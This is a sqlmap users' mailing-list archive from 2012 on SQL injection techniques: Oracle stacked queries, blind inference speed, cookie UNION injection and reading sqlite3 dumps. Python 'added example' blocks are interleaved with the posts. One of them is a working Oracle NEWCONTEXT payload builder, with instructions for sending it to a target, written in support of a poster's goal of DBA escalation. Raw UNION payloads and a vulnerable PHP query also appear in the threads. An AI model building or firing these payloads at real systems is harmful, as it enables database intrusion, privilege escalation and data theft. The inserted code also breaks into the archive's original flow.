Web application programming languages like PHP, ASP, ASP.NET and JSP obviously have functions to query Oracle (or rely on ODBC/JDBC or similar drivers). Regardless, they do not interpret and stack up separate queries sequentially when a semi-colon (;) is provided, hence stacked queries SQL injection by default won't work.
However, when the SQL injection is within an Oracle function and PL/SQL code is allowed, you can stack queries sequentially. We have an open ticket to deal with this, https://github.com/sqlmapproject/sqlmap/issues/16

> However, I've been reading and it seems (I could be wrong here, still
> playing) that from 8i to 11g R2 there are packages which allow execution of
> anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and
> dbms_xmlquery.getxml(). These are accessible to public by default. So an
> injection might be ?id=1 and (select dbms_xmlquery.newcontext('various;
> stacked; queries;') from dual) is not null -- I've looked at SQLMap's
> queries through a proxy and I don't think it does anything like this.
> Again, I'm just reading up on this now so I could well be off base here.

Correct. There are a few tricks as far as I am aware to stack queries in Oracle. This is one of those. sqlmap does not yet implement any of these.

> Ultimately, I'm trying to use the injection to gain DBA privs. I'm playing
> around manually at the moment but wondered if this is something SQLMap could
> potentially do and doesn't (or I'm totally wrong!)

Depending on the Oracle release and its version, you can leverage different PL/SQL injections in default functions/triggers to escalate your privileges to DBA. Metasploit has auxiliary modules for a number of these vulnerabilities, see here https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/sqli/oracle. Look at the source code and forge your SQLi payload accordingly.
We have an open ticket to automate DBA privilege escalation on Oracle, https://github.com/sqlmapproject/sqlmap/issues/29.

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
From: Chris O. <chr...@gm...> - 2012-10-03 20:33:49
|
Hi All

When I get an injection for an Oracle system on the back end, I can use --sql-shell with no problems. However, if I try to use stacked queries here, I get an error message from SQLMap saying that I can't do that unless stacked queries are enabled, which as far as I know you can't do with Oracle, so that makes sense.

However, I've been reading and it seems (I could be wrong here, still playing) that from 8i to 11g R2 there are packages which allow execution of anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and dbms_xmlquery.getxml(). These are accessible to public by default. So an injection might be ?id=1 and (select dbms_xmlquery.newcontext('various; stacked; queries;') from dual) is not null -- I've looked at SQLMap's queries through a proxy and I don't think it does anything like this. Again, I'm just reading up on this now so I could well be off base here.

Ultimately, I'm trying to use the injection to gain DBA privs. I'm playing around manually at the moment but wondered if this is something SQLMap could potentially do and doesn't (or I'm totally wrong!)

Regards
Chris |
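The payload shape Chris sketches above, and that Bernardo confirms as one of the known ways to stack statements on Oracle, has one practical difficulty that the one-line sketch hides: the statements sit inside a string literal that is itself inside a string literal, so every single quote has to be doubled twice, and one miscounted quote turns the whole thing into a syntax error that looks like a "not vulnerable" result. The builder below is an added example, not sqlmap's code and not code from either poster; it assembles the DBMS_XMLQUERY.NEWCONTEXT wrapper with the quoting done mechanically. The anonymous-block layout (EXECUTE IMMEDIATE for each statement, an autonomous transaction so DDL is accepted from inside a SELECT) follows the commonly published form and is an assumption to check against the target version. The sample statement only creates a table, which the CREATE TABLE privilege listed in the thread allows; escalation to DBA needs the version-specific PL/SQL injection bugs Bernardo points to, not this wrapper alone.

```python
from typing import List
from urllib.parse import quote

# Added example: stacked statements for Oracle smuggled into one anonymous
# PL/SQL block, passed as the string argument of DBMS_XMLQUERY.NEWCONTEXT
# inside a boolean expression.  The block layout is an assumption based on
# the commonly published pattern, not sqlmap code.


def sql_literal(s: str) -> str:
    """Oracle single-quoted literal: embedded quotes are doubled."""
    return "'" + s.replace("'", "''") + "'"


def plsql_block(statements: List[str]) -> str:
    """Wrap each statement in EXECUTE IMMEDIATE inside one anonymous block,
    so DDL is accepted and the block commits on its own."""
    parts = []
    for stmt in statements:
        stmt = stmt.strip().rstrip(";")
        parts.append(f"EXECUTE IMMEDIATE {sql_literal(stmt)};")
    return ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN "
            + " ".join(parts) + " COMMIT; END;")


def newcontext_expr(block: str) -> str:
    """Boolean expression that runs the block as a side effect.  The block
    becomes a string literal here, so its quotes are doubled a second time."""
    return (f"(SELECT DBMS_XMLQUERY.NEWCONTEXT({sql_literal(block)}) "
            f"FROM DUAL) IS NOT NULL")


def build_payload(param_value: str, statements: List[str],
                  prefix: str = "", suffix: str = "--") -> str:
    """Full parameter value for a numeric injection point such as ?id=1.
    prefix/suffix are whatever boundary the original query needs."""
    expr = newcontext_expr(plsql_block(statements))
    return f"{param_value}{prefix} AND {expr} {suffix}".strip()


def quotes_balanced(sql: str) -> bool:
    """Cheap sanity check before sending: single quotes must pair up."""
    return sql.count("'") % 2 == 0


def url_encode(payload: str) -> str:
    return quote(payload, safe="")


if __name__ == "__main__":
    # Constructed statements within the privileges listed in the thread.
    p = build_payload("1", ["CREATE TABLE probe_t (x NUMBER)",
                            "INSERT INTO probe_t VALUES (1)"])
    print(p)
    print(url_encode(p))
```

Send it with the same request sqlmap used to find the boolean-blind point, then confirm the side effect through the existing channel (for example, a boolean test on SELECT COUNT(*) FROM probe_t) rather than trusting the page response, since NEWCONTEXT returns a value whether or not the block's statements did anything useful.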
From: Miroslav S. <mir...@gm...> - 2012-09-27 08:12:07
|
Hi Jerome.

Could you explain how "regexp attacks" are different from blind-based inference (in terms of "faster")? Could you explain how "regexp attacks" could be used in time-based attacks (in terms of "faster") in real-life situations where network lags are non-deterministic?

My 2 cents. That paper is known to me from the time it got out. Personally I don't like it because here and there I need to explain what's wrong with it. It's an example of what "far fetched" means. The last couple of graphs are doing a comparison between "normal" and "regex", while what is called "normal" is not used anywhere. What they are calling "normal" is nothing else than a sequential lookup for a character value. Anyone normal is using at least some kind of O(log2 n) binary search in their tools/scripts. In short, "regexp attack" is the same thing as any other binary search method.

We use in sqlmap an approach that is graphically described at [1]. Also, you are welcome to watch for all the payloads that are coming out from sqlmap in `--technique=B` mode by using `-v 3`. Count them down per each character and freely compare to their results.

Kind regards,
Miroslav Stampar

[1] Slide 35, http://www.slideshare.net/stamparm/euro-python-2011miroslavstamparsqlmapsecuritydevelopmentinpython

On Wed, Sep 26, 2012 at 8:13 PM, Jerome Athias <ath...@gm...> wrote:
> Hi,
>
> I am currently trying to add support for the regexp technique (
> http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf ) for blind
> sqli.
> It is faster than time-based blind SQL injection.
> I have some problems defining the correct queries and payloads in the
> xml files.
> Did someone already work on it?
>
> Regards
> /JA
>
> ------------------------------------------------------------------------------
> How fast is your code?
> 3 out of 4 devs don't know how their code performs in production.
> Find out how slow your code is with AppDynamics Lite.
> http://ad.doubleclick.net/clk;262219672;13503038;z?
> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

-- 
Miroslav Stampar
http://about.me/stamparm |
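Miroslav's argument above is about request counts: a sequential lookup asks "is this character equal to X" once per candidate, while a bisection asks "is it greater than X" and halves the range each time. The simulation below is an added example, not sqlmap's inference code and not from the paper; it models a boolean-blind oracle that only answers one comparison per request, recovers a constructed secret both ways, and reports how many requests each took. The comparison payloads are shown as comments in the generic ASCII(SUBSTR(...)) form; the secret and the range 32..126 are assumptions for the demonstration.

```python
class BlindOracle:
    """Simulated boolean-blind oracle: the 'application' only reveals whether
    one comparison on one character of the secret is true, and we count how
    many such questions (HTTP requests, in the real case) are needed.  The
    secret is a constructed value; only the request count matters here."""

    def __init__(self, secret: str):
        self.secret = secret
        self.requests = 0

    def char_eq(self, pos: int, code: int) -> bool:
        # stands in for: ... AND ASCII(SUBSTR((query),pos,1))=code
        self.requests += 1
        return ord(self.secret[pos]) == code

    def char_gt(self, pos: int, code: int) -> bool:
        # stands in for: ... AND ASCII(SUBSTR((query),pos,1))>code
        self.requests += 1
        return ord(self.secret[pos]) > code


LO, HI = 32, 126  # printable ASCII range searched per character (assumed)


def extract_sequential(oracle: BlindOracle, length: int) -> str:
    """The 'normal' method the paper compares against: try each candidate."""
    out = ""
    for pos in range(length):
        for code in range(LO, HI + 1):
            if oracle.char_eq(pos, code):
                out += chr(code)
                break
    return out


def extract_bisect(oracle: BlindOracle, length: int) -> str:
    """Binary search: every '>' answer halves the candidate range, so a
    character costs about log2(95), i.e. 6 or 7 requests, whatever its value."""
    out = ""
    for pos in range(length):
        lo, hi = LO, HI
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.char_gt(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def compare(secret: str):
    """Return (sequential_requests, bisect_requests) for recovering secret,
    after checking that both methods actually recovered it."""
    o_seq, o_bis = BlindOracle(secret), BlindOracle(secret)
    if extract_sequential(o_seq, len(secret)) != secret:
        raise RuntimeError("sequential extraction failed")
    if extract_bisect(o_bis, len(secret)) != secret:
        raise RuntimeError("bisection extraction failed")
    return o_seq.requests, o_bis.requests


if __name__ == "__main__":
    seq, bis = compare("admin")  # constructed secret
    print(f"sequential: {seq} requests, bisection: {bis} requests")
```

To check the same thing against sqlmap itself rather than this model, run with --technique=B -v 3 as Miroslav suggests and count the payloads emitted per character; the count should sit in the same 6 to 7 band this bisection shows, not in the dozens a sequential scan needs.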
From: Jerome A. <ath...@gm...> - 2012-09-26 18:13:09
|
Hi,

I am currently trying to add support for the regexp technique ( http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf ) for blind sqli.
It is faster than time-based blind SQL injection.
I have some problems defining the correct queries and payloads in the xml files.
Did someone already work on it?

Regards
/JA |
From: Luka P. <lu...@pu...> - 2012-09-24 20:34:09
|
You say that you are using two tamper scripts... I would look for interference there. Can you post more details about your configuration?

Best regards,
Luka

On Mon, Sep 24, 2012 at 10:30 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Jack.
>
> I believe that you are talking about Microsoft SQL Server. sqlmap
> automatically removes the dbo prefix for that DBMS as it should not make any
> difference (dbo == database owner). So, database.dbo.table should be the
> same as database..table. Maybe you have some other issue?
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Sep 23, 2012 at 3:07 PM, Jack Jones <ab...@li...> wrote:
>> Dears,
>>
>> Every time I send an sqlmap query with a table name such as DBO.USERS it
>> forgets about the DBO. and only looks for USERS and there is no such table.
>>
>> In the query, two tampers are being used.
>>
>> Please advise, thanks
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-09-24 20:30:10
|
Hi Jack.

I believe that you are talking about Microsoft SQL Server. sqlmap automatically removes the dbo prefix for that DBMS as it should not make any difference (dbo == database owner). So, database.dbo.table should be the same as database..table. Maybe you have some other issue?

Kind regards,
Miroslav Stampar

On Sun, Sep 23, 2012 at 3:07 PM, Jack Jones <ab...@li...> wrote:
> Dears,
>
> Every time I send an sqlmap query with a table name such as DBO.USERS it
> forgets about the DBO. and only looks for USERS and there is no such table.
>
> In the query, two tampers are being used.
>
> Please advise, thanks

-- 
Miroslav Stampar
http://about.me/stamparm |
From: Jack J. <ab...@li...> - 2012-09-23 13:19:44
|
Dears,

Every time I send an sqlmap query with a table name such as DBO.USERS it forgets about the DBO. and only looks for USERS and there is no such table.

In the query, two tampers are being used.

Please advise, thanks |
From: mitchell <mit...@tu...> - 2012-09-22 19:22:28
|
...or he has used the --replicate switch, and now asks how to view the data? @Iago if this is the case, then you can use

# sqlite3 filename.db

(where filename.db is the name of the sqlite3 database) to connect to a sqlite3 database.

Then, you can use .help for more information.

~m.

On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Iago.
>
> Sorry, but it's not really clear what you are trying to do. You mean that
> you want to convert dumped content from CSV to sqlite3 DB or something else?
>
> Kind regards,
> Miroslav Stampar
>
> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote:
>> Hello there,
>> Can I read a dumped db into a sqlite3 file without sqlmap?
>>
>> I apologize for my little knowledge, but I really dunno how to do this.
>>
>> --
>> Regards, Iago Sousa
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-09-22 19:12:56
|
Hi.

1) For browsing a sqlite3 database I would recommend "SQLite Database Browser" [1]. On a Windows machine you are gonna need to download and install it. On Linux you should be able to find it in the default repositories (e.g. apt-get install sqlitebrowser).

2) For converting from CSV to sqlite3 I would recommend you to follow the steps given at [2]. In case of any problems I could make you a small python script which would do this for you.

Kind regards,
Miroslav Stampar

[1] http://sourceforge.net/projects/sqlitebrowser/
[2] http://smallbusiness.chron.com/import-csv-sqlite-48112.html

On Sat, Sep 22, 2012 at 8:53 PM, Iago Sousa <146...@gm...> wrote:
> Yes mitchell, I really wanted that.
>
> And I add the question that Miroslav has proposed.
>
> On Sat, Sep 22, 2012 at 3:50 PM, mitchell <mit...@tu...> wrote:
>> ...or he has used the --replicate switch, and now asks how to view the
>> data? @Iago if this is the case, then you can use
>>
>> # sqlite3 filename.db
>>
>> (where filename.db is the name of the sqlite3 database) to connect to a
>> sqlite3 database.
>>
>> Then, you can use .help for more information.
>>
>> ~m.
>>
>> On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> Hi Iago.
>>>
>>> Sorry, but it's not really clear what you are trying to do. You mean
>>> that you want to convert dumped content from CSV to sqlite3 DB or something
>>> else?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote:
>>>> Hello there,
>>>> Can I read a dumped db into a sqlite3 file without sqlmap?
>>>>
>>>> I apologize for my little knowledge, but I really dunno how to do this.
>>>>
>>>> --
>>>> Regards, Iago Sousa
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Regards, Iago Sousa
> Programmer and Security Researcher

-- 
Miroslav Stampar
http://about.me/stamparm |
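Miroslav offers above to write a small script for the CSV to sqlite3 step, and Iago's question further down asks for both directions plus a way to read the database without sqlmap. The script below is an added example along those lines, not code from Miroslav, Iago or the sqlmap project: it loads a CSV dump with a header row into a sqlite3 table, dumps a table back to CSV, and lists the tables, all with the standard library. The CSV text is constructed to look like a table dump (header, then one row per record; the values are made up). One point worth the extra lines: the table and column names come out of a dump of somebody else's database, so they are untrusted input to the SQL built here and are quoted as identifiers, while row values are bound parameters.

```python
import csv
import io
import sqlite3
from typing import List

# Constructed sample laid out like a table dump with a header row; values
# are made up for the example.
SAMPLE_CSV = """id,username,password
1,admin,5f4dcc3b5aa765d61d8327deb882cf99
2,o'brien,e10adc3949ba59abbe56e057f20f883e
3,"smith, j",
"""


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Use a real file path (e.g. output/site/dump/db.sqlite3) outside tests."""
    return sqlite3.connect(path)


def qident(name: str) -> str:
    """Quote an identifier.  Table and column names come from a dump of a
    target you do not control, so they are untrusted input to the SQL built
    here and are never interpolated bare."""
    return '"' + name.replace('"', '""') + '"'


def rows_of(csv_text: str) -> List[List[str]]:
    return list(csv.reader(io.StringIO(csv_text)))


def csv_to_sqlite(conn, table: str, csv_text: str) -> int:
    """Create <table> from the header row and load the remaining rows;
    returns the number of rows inserted.  Values are bound, not formatted."""
    rows = rows_of(csv_text)
    header, data = rows[0], rows[1:]
    cols = ", ".join(f"{qident(c)} TEXT" for c in header)
    conn.execute(f"CREATE TABLE IF NOT EXISTS {qident(table)} ({cols})")
    marks = ", ".join("?" for _ in header)
    conn.executemany(f"INSERT INTO {qident(table)} VALUES ({marks})", data)
    conn.commit()
    return len(data)


def sqlite_to_csv(conn, table: str) -> str:
    """Dump one table back to CSV text with a header row."""
    cur = conn.execute(f"SELECT * FROM {qident(table)}")
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow([d[0] for d in cur.description])
    writer.writerows(cur.fetchall())
    return out.getvalue()


def list_tables(conn) -> List[str]:
    q = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
    return [r[0] for r in conn.execute(q)]


def find(conn, table: str, column: str, value: str):
    """Look up rows by one column; the value travels as a bound parameter."""
    q = f"SELECT * FROM {qident(table)} WHERE {qident(column)} = ?"
    return conn.execute(q, (value,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    csv_to_sqlite(db, "users", SAMPLE_CSV)
    print(list_tables(db))
    print(sqlite_to_csv(db, "users"), end="")
```

For an existing dump file, open it with open_db("output/site/dump/db.sqlite3") and call list_tables and sqlite_to_csv; that is the same data the sqlite3 command-line client shows, just reachable from Python.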
From: Iago S. <146...@gm...> - 2012-09-22 18:53:45
|
Yes mitchell, I really wanted that.

And I add the question that Miroslav has proposed.

On Sat, Sep 22, 2012 at 3:50 PM, mitchell <mit...@tu...> wrote:
> ...or he has used the --replicate switch, and now asks how to view the
> data? @Iago if this is the case, then you can use
>
> # sqlite3 filename.db
>
> (where filename.db is the name of the sqlite3 database) to connect to a
> sqlite3 database.
>
> Then, you can use .help for more information.
>
> ~m.
>
> On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>> Hi Iago.
>>
>> Sorry, but it's not really clear what you are trying to do. You mean that
>> you want to convert dumped content from CSV to sqlite3 DB or something else?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote:
>>> Hello there,
>>> Can I read a dumped db into a sqlite3 file without sqlmap?
>>>
>>> I apologize for my little knowledge, but I really dunno how to do this.
>>>
>>> --
>>> Regards, Iago Sousa
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

-- 
Regards, Iago Sousa
Programmer and Security Researcher |
From: Iago S. <146...@gm...> - 2012-09-22 18:51:12
|
I want to convert sqlite3 into CSV, and the other way around (vice versa), and I'd like to know if I can read the sqlite3 without sqlmap.

I can use the line below to read all tables in a site stored in a sqlite3 file:

./sqlmap.py -d sqlite://output/site/dump/db.sqlite3 --table

Can I read a sqlite3 DB without using sqlmap.py? Using sqlite3 itself.

I only want to know; if it is not possible, there is no problem here.

Sorry for the unclear message.

On Sat, Sep 22, 2012 at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Iago.
>
> Sorry, but it's not really clear what you are trying to do. You mean that
> you want to convert dumped content from CSV to sqlite3 DB or something else?
>
> Kind regards,
> Miroslav Stampar
>
> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote:
>> Hello there,
>> Can I read a dumped db into a sqlite3 file without sqlmap?
>>
>> I apologize for my little knowledge, but I really dunno how to do this.
>>
>> --
>> Regards, Iago Sousa
>
> --
> Miroslav Stampar
> http://about.me/stamparm

-- 
Regards, Iago Sousa
Programmer and Security Researcher |
From: Miroslav S. <mir...@gm...> - 2012-09-22 18:35:17
|
Hi Iago.

Sorry, but it's not really clear what you are trying to do. You mean that you want to convert dumped content from CSV to sqlite3 DB or something else?

Kind regards,
Miroslav Stampar

On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote:
> Hello there,
> Can I read a dumped db into a sqlite3 file without sqlmap?
>
> I apologize for my little knowledge, but I really dunno how to do this.
>
> --
> Regards, Iago Sousa

-- 
Miroslav Stampar
http://about.me/stamparm |
From: Iago S. <146...@gm...> - 2012-09-22 16:12:41
|
Hello there,
Can I read a dumped db into a sqlite3 file without sqlmap?

I apologize for my little knowledge, but I really dunno how to do this.

-- 
Regards, Iago Sousa |
From: Miroslav S. <mir...@gm...> - 2012-09-17 20:40:05
|
Hi Stephen.

There is really a problem here. Could you please update to the latest revision and do the:

... --flush-session -t traffic.txt -v 3

and send back the new session file. It seems that for some reason sqlmap is doing only one type of boundaries in your case (skipping this simple: ') ...

Also, it would be great if you send a full console output of such a clean run (please, use -v 3).

Kind regards,
Miroslav Stampar

On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <ss...@ss...> wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#' onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token: 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account statement, released 04 November 2011. This account is due to be paid on <b>05 November 2011</b>. Failure to pay this amount before the due date may result in service disruption.<br><br><h3>Account Statement</h3><hr><table><tr><td width=200>Account Number</td><td width=450>Description of Service</td><td>Amount</td></tr></table><hr><table><tr><td width=200>1</td><td width=450>Basic Power Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <mir...@gm...> wrote:
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any means more than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1" -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how you are able to "definitely able to pull out
>>>>>> results" as far as I can see the problem lies in the used PHP (enclosed pair of
>>>>>> single quotes with another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = *'$_COOKIE['sesh']'*)");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = *'$_COOKIE[sesh]'*)");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at a similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1] http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...> wrote:
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

-- 
Miroslav Stampar
http://about.me/stamparm |
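The whole thread above turns on the boundary: the cookie lands inside a quoted string that is itself inside a parenthesised subquery, so a payload only works if it closes both (the ') prefix Stephen used by hand) and comments out the trailing ') from the original query. The checker below is an added example, not sqlmap's boundary detection and not code from either poster; it takes a query template mirroring the PHP from the thread, tries a handful of prefix/suffix pairs, and reports which ones leave the payload outside any string literal with quotes and parentheses still balanced once the comment cuts the rest off. The template and the boundary list are constructed for the demonstration; the comment marker is "-- " with the trailing space MySQL requires.

```python
from typing import List, Tuple

# Constructed query template mirroring the PHP in the thread; {} marks where
# the cookie value lands.  Only the quoting/parenthesis context matters here.
TEMPLATE = (
    "SELECT userid, custname, custemail, owing FROM custdata AS cd "
    "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = '{}')"
)

# (prefix, suffix) pairs in the spirit of sqlmap's boundaries; assumed list.
BOUNDARIES: List[Tuple[str, str]] = [
    ("", ""),
    ("'", "-- "),
    ("')", "-- "),
    ('"', "-- "),
    ('")', "-- "),
]


def analyze(sql: str, pos: int) -> Tuple[bool, bool]:
    """Scan sql tracking string literals and parenthesis depth.  Returns
    (balanced, inside_string_at_pos).  balanced: all quotes closed and all
    parentheses matched, ignoring text after a '-- ' comment that sits
    outside a string.  inside_string_at_pos: whether offset pos is inside a
    literal, i.e. whether a payload placed there is still just data."""
    depth = 0
    quote = None
    inside_at_pos = False
    i = 0
    while i < len(sql):
        if i == pos:
            inside_at_pos = quote is not None
        ch = sql[i]
        if quote:
            if ch == quote:
                if sql.startswith(quote * 2, i):  # doubled quote, stays inside
                    i += 2
                    continue
                quote = None
        elif sql.startswith("-- ", i):
            break
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False, inside_at_pos
        i += 1
    return (quote is None and depth == 0), inside_at_pos


def find_boundaries(template: str, payload: str = "UNION SELECT 1,2,3,4",
                    boundaries=BOUNDARIES) -> List[Tuple[str, str]]:
    """Return the (prefix, suffix) pairs for which the payload lands outside
    any string literal and the resulting statement still parses cleanly."""
    hits = []
    for prefix, suffix in boundaries:
        value = f"1{prefix} {payload}{suffix}"
        sql = template.format(value)
        balanced, inside = analyze(sql, sql.index(payload))
        if balanced and not inside:
            hits.append((prefix, suffix))
    return hits


if __name__ == "__main__":
    print(find_boundaries(TEMPLATE))  # the ') / -- pair from the thread
```

When the boundary is known from a manual test like Stephen's but sqlmap's own detection is skipping it, sqlmap's existing --prefix and --suffix options pin it (here --prefix="')" --suffix="-- "), which is independent of the traffic file Miroslav asks for.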